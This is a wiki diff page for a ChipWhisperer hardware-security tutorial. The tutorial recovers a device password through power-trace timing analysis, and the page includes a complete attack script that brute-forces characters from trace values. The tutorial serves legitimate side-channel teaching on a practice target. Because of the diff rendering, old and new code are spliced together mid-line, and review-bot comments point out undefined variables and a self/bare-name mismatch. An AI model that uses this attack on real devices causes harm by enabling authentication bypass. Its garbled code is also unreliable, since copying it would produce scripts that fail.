As of August 2020 the site you are on (wiki.newae.com) is deprecated, and content is now at rtfm.newae.com.

Changes


Tutorial B3-1 Timing Analysis with Power for Password Bypass

1,531 bytes removed, 17:07, 23 September 2017
Running a Single Capture
</li>
<li><p>Finally, we We will need to set the passwordguess so we can observe different traces. You can enter the password in the Capture ''Target Settings'' tab, or simply use a command like <code>target.go_cmd = 'h0p3\n'</code>.</p></li>
<li>Finally, run the script you made. It should load all settings & on hitting capture-1 you will get a waveform related to the power measurement during the comparison.</li>
</ol>
With our settings prepared, the next step is to use our script to record and analyze a power trace. We need to be able to get the trace data into our Python script so we can analyze it for the timing attack.
The API allows us to ''press the Capture 1'' button and ''view the power trace'' without using the GUI. There are two relevant commands here. First, we'll need to import ChipWhisperer: * <code> self.api.capture1()import chipwhisperer as cw</code> acts as if  Then, we've just pressed can build our own "capture controller". This controller deals with talking to the ''Capture 1'' button;scope and target for you. To capture a single trace you could perform the following steps: * <codesyntaxhighlight lang=python> # Test one capturecw.captureN(self.apiscope, self.getScope()target, None, self.channels[0]aux_list, self.getTracektp, 1)trace = scope.getLastTrace()</codesyntaxhighlight> returns a list of datapoints that were recorded in the previous capture. 
We want to test these two commands. After the setup portion of your script, add some code similar to the following:
<presyntaxhighlight lang=python>#Put this at beginning of scriptimport chipwhisperer as cw #Put this later on after setup happenscw.captureN(self.apiscope, self.capture1()data = target, None, self.apiaux_list, self.getScope(ktp, 1)trace = scope.channels[0].getTracegetLastTrace()print datatrace</presyntaxhighlight> Run your script. The ChipWhisperer should automatically capture one trace and print out the several thousand some datapoints. (Note that output of <code>print</code> statements may go to the ''Debug Logging'' tab in the GUI.) This is all we need to continue.
== Attacking a Single Letter ==
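Review bot: In the new capture example, cw.captureN(scope, target, None, aux_list, ktp, 1) passes ktp, but nothing in the changed text says what ktp is or where the script gets it; the sentence introducing the "capture controller" only mentions the scope and target. Add a line stating where ktp and aux_list are defined, or show the assignment in the snippet, so the block can be pasted after the setup portion as the instructions say. The same snippet also appears twice in this section now, once under "To capture a single trace" and again under "add some code similar to the following"; consider keeping only one.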
= Appendix: Completed Timing Attack Script =
The <code>run()</code> function at the end of the complete tutorial might look something like the followingthis:<presyntaxhighlight lang=python>"""This script is an example of a timing attack on a simple password checker. It is the result of Tutorial B3-1 from the ChipWhisperer Wiki.""" import chipwhisperer as cwfrom chipwhisperer.capture.auxiliary.ResetCW1173Read import ResetCW1173 # GUI compatibilitytry: def runscope = self.scope target = self.target aux_list = self.aux_listexcept NameError: pass # Set up scopescope.gain.gain = 45scope.adc.samples = 2000scope.adc.offset = 0scope.adc.basic_mode = "rising_edge"scope.clock.clkgen_freq = 7370000scope.clock.adc_src = "clkgen_x4"scope.trigger.triggers = "tio4"scope.io.tio1 = "serial_rx"scope.io.tio2 = "serial_tx"scope.io.hs2 = "clkgen" # Set up targettarget.key_cmd = ""target.go_cmd = "h0px3\n"target.output_cmd = "" # Set up aux module to reset target before captureresetter = ResetCW1173(xmega=True, delay_ms=1200)aux_list.register(resetter.resetThenDelay, "before_trace") # Test one capturecw.captureN(self.scope, self.target, None, self.aux_list, self.ktp, 1)trace = scope.getLastTrace()print trace # Crack the first letterpassword = ''trylist = 'abcdefghijklmnopqrstuvwxyz0123456789' for i in range(5): for c in trylist: # This is the function that gets called when Get a power trace using our script startsnext attempt nextPass = password + '{}'.format(c) + "\n" target.go_cmd = nextPass cw.captureN(self.scope, self.target, None, self.aux_list, self.ktp, 1)
# First: set up Grab the basics and connect to the CW-Litetrace self.api.setParameter(['Generic Settings', 'Scope Module', 'ChipWhisperer/OpenADC']) self.api.setParameter(['Generic Settings', 'Target Module', 'Simple Serial']) self.api.setParameter(['Generic Settings', 'Trace Format', 'ChipWhisperer/Native']) self.api.setParameter(['Simple Serial', 'Connection', 'ChipWhisperer-Lite']) self.api.setParameter(['ChipWhisperer/OpenADC', 'Connection', 'ChipWhisperer-Lite']) self.apinextTrace = scope.connectgetLastTrace()
# Next: set up everything we need to connect to the target # Put all of our commands in a list and execute them at the end lstexample = [ # Gain ['OpenADC', 'Gain Setting', 'Setting', 45], # Trigger ['OpenADC', 'Trigger Setup', 'Mode', 'rising edge'], ['OpenADC', 'Trigger Setup', 'Offset', 0], ['OpenADC', 'Trigger Setup', 'Total Samples', 2000], # Clock ['OpenADC', 'Clock Setup', 'CLKGEN Settings', 'Desired Frequency', 7370000.0], ['OpenADC', 'Clock Setup', 'ADC Clock', 'Source', 'CLKGEN x4 via DCM'], ['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None], # Pins ['CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True], ['CW Extra Settings', 'Target HS IO-Out', 'CLKGEN'], ['CW Extra Settings', 'Target IOn Pins', 'Target IO1', 'Serial RXD'], ['CW Extra Settings', 'Target IOn Pins', 'Target IO2', 'Serial TXD'], # Automatic commands ['Simple Serial', 'Load Key Command', ''], ['Simple Serial', 'Go Command', 'h0px3\n'], ['Simple Serial', 'Output Format', ''], # Auto-reset ['Generic Settings', 'Auxiliary Module', 'Reset AVR/XMEGA via CW-Lite'], ['Aux Settings', 'Reset AVR/XMEGA via CW-Lite', 'Delay (Post-Arm)', 1200], ] #Download all hardware setup parameters for cmd in lstexample: self.api.setParameter(cmd) # Get one capture for fun self.api.capture1() data = self.api.getScope().channels[0].getTrace() print data # Crack the first letter password = '' trylist = 'abcdefghijklmnopqrstuvwxyz0123456789' for i in range(5): for c in trylist: # Get a power trace using our next attempt nextPass = password + '{}'.format(c) self.api.setParameter(['Simple Serial', 'Go Command', '{}\n'.format(nextPass)]) self.api.capture1() # Grab the trace nextTrace = self.api.getScope().channels[0].getTrace() # Check location 153, 225, etc. If it's too low, we've failed if nextTrace[153 + 72*i] < -0.2: continue # If we got here, we've found the right letter password += c print '{} characters: {}'.format(i+1, password) break</presyntaxhighlight>
{{Template:Tutorials}}
[[Category:Tutorials]]
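Review bot: Both cw.captureN calls in the appendix script pass self.scope, self.target, self.aux_list and self.ktp, while the "GUI compatibility" try/except at the top binds the bare names scope, target and aux_list, and every other line (scope.gain.gain, target.go_cmd, scope.getLastTrace()) uses those bare names. Outside the try block a missing self is no longer caught, and ktp has no alias at all. Use the bare names in the captureN calls, as the example in "Running a Single Capture" does, and bind ktp next to the others. Separately, in the cracking loop, if no character in trylist passes the nextTrace[153 + 72*i] check, the inner loop ends without extending password and the outer loop carries on with the next index; an else branch on the inner for that reports the failure and stops would make that case visible.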